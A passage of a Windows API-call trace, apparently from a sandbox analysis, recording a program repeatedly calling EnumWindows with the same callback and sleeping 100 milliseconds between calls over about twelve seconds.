EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.776] Sleep (dwMilliseconds=0x64) [0165.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.782] Sleep (dwMilliseconds=0x64) [0165.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.797] Sleep (dwMilliseconds=0x64) [0165.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.857] Sleep (dwMilliseconds=0x64) [0165.905] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.906] Sleep (dwMilliseconds=0x64) [0165.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.954] Sleep (dwMilliseconds=0x64) [0166.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.001] Sleep (dwMilliseconds=0x64) [0166.017] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.018] Sleep (dwMilliseconds=0x64) [0166.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.028] Sleep (dwMilliseconds=0x64) [0166.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.062] Sleep (dwMilliseconds=0x64) [0166.126] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.127] Sleep (dwMilliseconds=0x64) [0166.152] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.153] Sleep (dwMilliseconds=0x64) [0166.169] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.169] Sleep (dwMilliseconds=0x64) [0166.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.216] Sleep (dwMilliseconds=0x64) [0166.279] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.280] Sleep (dwMilliseconds=0x64) [0166.307] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.308] Sleep (dwMilliseconds=0x64) [0166.345] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.346] Sleep (dwMilliseconds=0x64) [0166.424] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.425] Sleep (dwMilliseconds=0x64) [0166.459] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.463] Sleep (dwMilliseconds=0x64) [0166.485] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.486] Sleep (dwMilliseconds=0x64) [0166.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.501] Sleep (dwMilliseconds=0x64) [0166.546] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.547] Sleep (dwMilliseconds=0x64) [0166.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.594] Sleep (dwMilliseconds=0x64) [0166.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.653] Sleep (dwMilliseconds=0x64) [0166.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.734] Sleep (dwMilliseconds=0x64) [0166.809] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.810] Sleep (dwMilliseconds=0x64) [0166.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.860] Sleep (dwMilliseconds=0x64) [0166.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.903] Sleep (dwMilliseconds=0x64) [0166.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.953] Sleep (dwMilliseconds=0x64) [0166.972] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.972] Sleep (dwMilliseconds=0x64) [0166.986] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0166.987] Sleep (dwMilliseconds=0x64) [0167.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.015] Sleep (dwMilliseconds=0x64) [0167.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.063] Sleep (dwMilliseconds=0x64) [0167.111] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.112] Sleep (dwMilliseconds=0x64) [0167.124] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.125] Sleep (dwMilliseconds=0x64) [0167.143] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.144] Sleep (dwMilliseconds=0x64) [0167.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.188] Sleep (dwMilliseconds=0x64) [0167.235] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.236] Sleep (dwMilliseconds=0x64) [0167.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.282] Sleep (dwMilliseconds=0x64) [0167.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.325] Sleep (dwMilliseconds=0x64) [0167.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.376] Sleep (dwMilliseconds=0x64) [0167.451] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.452] Sleep (dwMilliseconds=0x64) [0167.471] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.472] Sleep (dwMilliseconds=0x64) [0167.506] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.509] Sleep (dwMilliseconds=0x64) [0167.535] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.536] Sleep (dwMilliseconds=0x64) [0167.578] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.579] Sleep (dwMilliseconds=0x64) [0167.616] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.617] Sleep (dwMilliseconds=0x64) [0167.623] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.623] Sleep (dwMilliseconds=0x64) [0167.642] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.642] Sleep (dwMilliseconds=0x64) [0167.687] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.688] Sleep (dwMilliseconds=0x64) [0167.728] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.729] Sleep (dwMilliseconds=0x64) [0167.732] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.732] Sleep (dwMilliseconds=0x64) [0167.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.782] Sleep (dwMilliseconds=0x64) [0167.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.828] Sleep (dwMilliseconds=0x64) [0167.843] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.844] Sleep (dwMilliseconds=0x64) [0167.860] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.860] Sleep (dwMilliseconds=0x64) [0167.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.891] Sleep (dwMilliseconds=0x64) [0167.953] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.954] Sleep (dwMilliseconds=0x64) [0167.977] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0167.977] Sleep (dwMilliseconds=0x64) [0168.058] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.059] Sleep (dwMilliseconds=0x64) [0168.125] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.125] Sleep (dwMilliseconds=0x64) [0168.161] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.161] Sleep (dwMilliseconds=0x64) [0168.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.172] Sleep (dwMilliseconds=0x64) [0168.188] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.189] Sleep (dwMilliseconds=0x64) [0168.233] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.234] Sleep (dwMilliseconds=0x64) [0168.274] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.275] Sleep (dwMilliseconds=0x64) [0168.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.280] Sleep (dwMilliseconds=0x64) [0168.345] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.346] Sleep (dwMilliseconds=0x64) [0168.407] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.408] Sleep (dwMilliseconds=0x64) [0168.454] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.454] Sleep (dwMilliseconds=0x64) [0168.561] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.562] Sleep (dwMilliseconds=0x64) [0168.599] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.600] Sleep (dwMilliseconds=0x64) [0168.626] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.627] Sleep (dwMilliseconds=0x64) [0168.669] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.669] Sleep (dwMilliseconds=0x64) [0168.708] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.709] Sleep (dwMilliseconds=0x64) [0168.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.716] Sleep (dwMilliseconds=0x64) [0168.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.734] Sleep (dwMilliseconds=0x64) [0168.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.782] Sleep (dwMilliseconds=0x64) [0168.817] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.818] Sleep (dwMilliseconds=0x64) [0168.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.825] Sleep (dwMilliseconds=0x64) [0168.845] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.845] Sleep (dwMilliseconds=0x64) [0168.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.891] Sleep (dwMilliseconds=0x64) [0168.935] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.935] Sleep (dwMilliseconds=0x64) [0168.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0168.985] Sleep (dwMilliseconds=0x64) [0169.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.032] Sleep (dwMilliseconds=0x64) [0169.049] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.049] Sleep (dwMilliseconds=0x64) [0169.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.062] Sleep (dwMilliseconds=0x64) [0169.105] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.105] Sleep (dwMilliseconds=0x64) [0169.266] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.266] Sleep (dwMilliseconds=0x64) [0169.284] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.285] Sleep (dwMilliseconds=0x64) [0169.293] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.294] Sleep (dwMilliseconds=0x64) [0169.323] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.324] Sleep (dwMilliseconds=0x64) [0169.393] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.394] Sleep (dwMilliseconds=0x64) [0169.424] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.425] Sleep (dwMilliseconds=0x64) [0169.467] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.468] Sleep (dwMilliseconds=0x64) [0169.506] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.510] Sleep (dwMilliseconds=0x64) [0169.636] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.639] Sleep (dwMilliseconds=0x64) [0169.702] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.703] Sleep (dwMilliseconds=0x64) [0169.750] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.751] Sleep (dwMilliseconds=0x64) [0169.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.797] Sleep (dwMilliseconds=0x64) [0169.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.859] Sleep (dwMilliseconds=0x64) [0169.913] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.915] Sleep (dwMilliseconds=0x64) [0169.924] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.924] Sleep (dwMilliseconds=0x64) [0169.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.934] Sleep (dwMilliseconds=0x64) [0169.966] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0169.969] Sleep (dwMilliseconds=0x64) [0170.013] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.017] Sleep (dwMilliseconds=0x64) [0170.048] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.049] Sleep (dwMilliseconds=0x64) [0170.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.062] Sleep (dwMilliseconds=0x64) [0170.083] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.083] Sleep (dwMilliseconds=0x64) [0170.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.142] Sleep (dwMilliseconds=0x64) [0170.199] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.200] Sleep (dwMilliseconds=0x64) [0170.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.263] Sleep (dwMilliseconds=0x64) [0170.377] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.378] Sleep (dwMilliseconds=0x64) [0170.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.434] Sleep (dwMilliseconds=0x64) [0170.493] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.493] Sleep (dwMilliseconds=0x64) [0170.498] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.499] Sleep (dwMilliseconds=0x64) [0170.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.544] Sleep (dwMilliseconds=0x64) [0170.634] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.638] Sleep (dwMilliseconds=0x64) [0170.688] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.688] Sleep (dwMilliseconds=0x64) [0170.750] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.751] Sleep (dwMilliseconds=0x64) [0170.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.813] Sleep (dwMilliseconds=0x64) [0170.878] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.878] Sleep (dwMilliseconds=0x64) [0170.942] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.943] Sleep (dwMilliseconds=0x64) [0170.985] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0170.985] Sleep (dwMilliseconds=0x64) [0171.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.032] Sleep (dwMilliseconds=0x64) [0171.053] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.057] Sleep (dwMilliseconds=0x64) [0171.060] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.060] Sleep (dwMilliseconds=0x64) [0171.082] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.083] Sleep (dwMilliseconds=0x64) [0171.177] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.178] Sleep (dwMilliseconds=0x64) [0171.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.234] Sleep (dwMilliseconds=0x64) [0171.246] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.247] Sleep (dwMilliseconds=0x64) [0171.298] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.298] Sleep (dwMilliseconds=0x64) [0171.344] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.344] Sleep (dwMilliseconds=0x64) [0171.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.391] Sleep (dwMilliseconds=0x64) [0171.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.438] Sleep (dwMilliseconds=0x64) [0171.461] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.462] Sleep (dwMilliseconds=0x64) [0171.467] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.467] Sleep (dwMilliseconds=0x64) [0171.484] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.485] Sleep (dwMilliseconds=0x64) [0171.531] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.531] Sleep (dwMilliseconds=0x64) [0171.701] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.702] Sleep (dwMilliseconds=0x64) [0171.718] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.719] Sleep (dwMilliseconds=0x64) [0171.819] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.820] Sleep (dwMilliseconds=0x64) [0171.900] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.902] Sleep (dwMilliseconds=0x64) [0171.995] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0171.996] Sleep (dwMilliseconds=0x64) [0172.077] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.078] Sleep (dwMilliseconds=0x64) [0172.186] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.187] Sleep (dwMilliseconds=0x64) [0172.264] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.265] Sleep (dwMilliseconds=0x64) [0172.357] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.358] Sleep (dwMilliseconds=0x64) [0172.445] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.445] Sleep (dwMilliseconds=0x64) [0172.461] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.462] Sleep (dwMilliseconds=0x64) [0172.483] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.487] Sleep (dwMilliseconds=0x64) [0172.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.563] Sleep (dwMilliseconds=0x64) [0172.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.610] Sleep (dwMilliseconds=0x64) [0172.629] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.630] Sleep (dwMilliseconds=0x64) [0172.720] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.721] Sleep (dwMilliseconds=0x64) [0172.829] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.830] Sleep (dwMilliseconds=0x64) [0172.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.875] Sleep (dwMilliseconds=0x64) [0172.897] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.900] Sleep (dwMilliseconds=0x64) [0172.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.904] Sleep (dwMilliseconds=0x64) [0172.921] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.922] Sleep (dwMilliseconds=0x64) [0172.984] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0172.984] Sleep (dwMilliseconds=0x64) [0173.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0173.016] Sleep (dwMilliseconds=0x64) [0173.030] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0173.031] Sleep (dwMilliseconds=0x64) [0173.044] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0173.047] Sleep (dwMilliseconds=0x64) [0173.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0173.094] Sleep (dwMilliseconds=0x64) [0173.149] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0173.150] Sleep (dwMilliseconds=0x64) [0173.155] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0173.155] Sleep (dwMilliseconds=0x64) [0173.200] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0173.479] Sleep (dwMilliseconds=0x64) [0173.756] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0173.756] Sleep (dwMilliseconds=0x64) [0173.926] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0173.926] Sleep (dwMilliseconds=0x64) [0174.040] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.041] Sleep (dwMilliseconds=0x64) [0174.094] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.094] Sleep (dwMilliseconds=0x64) [0174.157] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.158] Sleep (dwMilliseconds=0x64) [0174.191] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.192] Sleep (dwMilliseconds=0x64) [0174.199] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.200] Sleep (dwMilliseconds=0x64) [0174.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.216] Sleep (dwMilliseconds=0x64) [0174.266] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.266] Sleep (dwMilliseconds=0x64) [0174.312] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.313] Sleep (dwMilliseconds=0x64) [0174.360] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.361] Sleep (dwMilliseconds=0x64) [0174.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.404] Sleep (dwMilliseconds=0x64) [0174.435] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.436] Sleep (dwMilliseconds=0x64) [0174.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.454] Sleep (dwMilliseconds=0x64) [0174.500] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.501] Sleep (dwMilliseconds=0x64) [0174.547] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.548] Sleep (dwMilliseconds=0x64) [0174.562] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.562] Sleep (dwMilliseconds=0x64) [0174.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.610] Sleep (dwMilliseconds=0x64) [0174.670] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.671] Sleep (dwMilliseconds=0x64) [0174.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.749] Sleep (dwMilliseconds=0x64) [0174.797] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.798] Sleep (dwMilliseconds=0x64) [0174.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.857] Sleep (dwMilliseconds=0x64) [0174.900] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.901] Sleep (dwMilliseconds=0x64) [0174.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.903] Sleep (dwMilliseconds=0x64) [0174.921] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.922] Sleep (dwMilliseconds=0x64) [0174.969] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.970] Sleep (dwMilliseconds=0x64) [0174.994] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.994] Sleep (dwMilliseconds=0x64) [0174.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0174.997] Sleep (dwMilliseconds=0x64) [0175.014] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0175.015] Sleep (dwMilliseconds=0x64) [0175.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0175.062] Sleep (dwMilliseconds=0x64) [0175.084] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0175.084] Sleep (dwMilliseconds=0x64) [0175.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0175.093] Sleep (dwMilliseconds=0x64) [0175.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0175.265] Sleep (dwMilliseconds=0x64) [0175.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0175.359] Sleep (dwMilliseconds=0x64) [0175.425] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0175.425] Sleep (dwMilliseconds=0x64) [0175.928] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0175.929] Sleep (dwMilliseconds=0x64) [0176.003] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.003] Sleep (dwMilliseconds=0x64) [0176.074] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.075] Sleep (dwMilliseconds=0x64) [0176.160] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.163] Sleep (dwMilliseconds=0x64) [0176.261] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.262] Sleep (dwMilliseconds=0x64) [0176.524] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.525] Sleep (dwMilliseconds=0x64) [0176.576] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.577] Sleep (dwMilliseconds=0x64) [0176.613] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.614] Sleep (dwMilliseconds=0x64) [0176.657] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.658] Sleep (dwMilliseconds=0x64) [0176.685] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.686] Sleep (dwMilliseconds=0x64) [0176.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.766] Sleep (dwMilliseconds=0x64) [0176.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.842] Sleep (dwMilliseconds=0x64) [0176.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.923] Sleep (dwMilliseconds=0x64) [0176.998] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0176.999] Sleep (dwMilliseconds=0x64) [0177.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.060] Sleep (dwMilliseconds=0x64) [0177.124] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.126] Sleep (dwMilliseconds=0x64) [0177.157] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.159] Sleep (dwMilliseconds=0x64) [0177.223] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.224] Sleep (dwMilliseconds=0x64) [0177.362] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.363] Sleep (dwMilliseconds=0x64) [0177.391] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.392] Sleep (dwMilliseconds=0x64) [0177.408] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.408] Sleep (dwMilliseconds=0x64) [0177.439] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.439] Sleep (dwMilliseconds=0x64) [0177.545] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.546] Sleep (dwMilliseconds=0x64) [0177.566] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.569] Sleep (dwMilliseconds=0x64) [0177.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.575] Sleep (dwMilliseconds=0x64) [0177.611] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.612] Sleep (dwMilliseconds=0x64) [0177.658] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.658] Sleep (dwMilliseconds=0x64) [0177.678] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.678] Sleep (dwMilliseconds=0x64) [0177.702] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.703] Sleep (dwMilliseconds=0x64) [0177.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.734] Sleep (dwMilliseconds=0x64) [0177.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.781] Sleep (dwMilliseconds=0x64) [0177.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.828] Sleep (dwMilliseconds=0x64) [0177.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.876] Sleep (dwMilliseconds=0x64) [0177.889] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.889] Sleep (dwMilliseconds=0x64) [0177.905] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.906] Sleep (dwMilliseconds=0x64) [0177.952] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0177.953] Sleep (dwMilliseconds=0x64) [0177.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.010] Sleep (dwMilliseconds=0x64) [0178.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.012] Sleep (dwMilliseconds=0x64) [0178.050] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.051] Sleep (dwMilliseconds=0x64) 